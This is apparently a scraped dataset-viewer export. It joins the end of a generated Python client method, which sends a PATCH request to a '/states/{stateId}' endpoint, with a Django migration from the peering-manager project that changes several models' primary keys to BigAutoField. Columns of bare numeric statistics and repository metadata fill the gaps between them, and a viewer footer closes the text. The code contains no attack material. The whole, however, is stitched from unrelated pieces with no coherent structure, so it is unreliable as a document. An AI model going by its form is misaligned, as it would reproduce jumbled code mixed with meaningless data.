    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # The partial State update is sent as the request body.
    if 'state' in params:
        body_params = params['state']
    # HTTP header `Accept`
    header_params['Accept'] = cls.get_api_client().select_header_accept(
        ['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
        ['application/json'])

    # Authentication setting
    auth_settings = []

    # FIX: `async` is a reserved word in Python 3.7+, so it cannot be a
    # literal keyword argument; pass it via dict unpacking instead
    # (runtime-equivalent, and parseable on all Python 3 versions).
    return cls.get_api_client().call_api(
        '/states/{stateId}', 'PATCH',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='State',
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
| 31.514586
| 108
| 0.588122
| 3,150
| 27,008
| 4.791111
| 0.060317
| 0.027829
| 0.019679
| 0.028624
| 0.848595
| 0.8152
| 0.802876
| 0.796382
| 0.781407
| 0.781407
| 0
| 0.000488
| 0.316499
| 27,008
| 856
| 109
| 31.551402
| 0.817064
| 0.029991
| 0
| 0.653595
| 0
| 0
| 0.126649
| 0.023972
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010893
| null | null | 0.004357
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
908ce460d25097704e571633ea64c9b238be4e9f
| 2,707
|
py
|
Python
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 173
|
2020-08-08T15:38:08.000Z
|
2022-03-21T11:35:25.000Z
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 247
|
2017-12-26T12:55:34.000Z
|
2020-08-08T11:57:35.000Z
|
peering/migrations/0072_auto_20210420_2144.py
|
maznu/peering-manager
|
d249fcf530f4cc48b39429badb79bc203e0148ba
|
[
"Apache-2.0"
] | 63
|
2017-10-13T06:46:05.000Z
|
2020-08-08T00:41:57.000Z
|
# Generated by Django 3.2 on 2021-04-20 19:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Switch every model's implicit `id` primary key to BigAutoField."""

    dependencies = [
        ("peering", "0071_auto_20210321_1843"),
    ]

    # Each model receives the identical AlterField: the auto-created
    # `id` column becomes a BigAutoField primary key.
    operations = [
        migrations.AlterField(
            model_name=model_name,
            name="id",
            field=models.BigAutoField(
                auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
            ),
        )
        for model_name in (
            "autonomoussystem",
            "bgpgroup",
            "community",
            "configuration",
            "directpeeringsession",
            "email",
            "internetexchange",
            "internetexchangepeeringsession",
            "router",
            "routingpolicy",
        )
    ]
| 32.22619
| 87
| 0.542298
| 238
| 2,707
| 5.987395
| 0.201681
| 0.084211
| 0.175439
| 0.203509
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0.779649
| 0
| 0.017114
| 0.35242
| 2,707
| 83
| 88
| 32.614458
| 0.795779
| 0.015885
| 0
| 0.779221
| 1
| 0
| 0.077385
| 0.01991
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012987
| 0
| 0.051948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.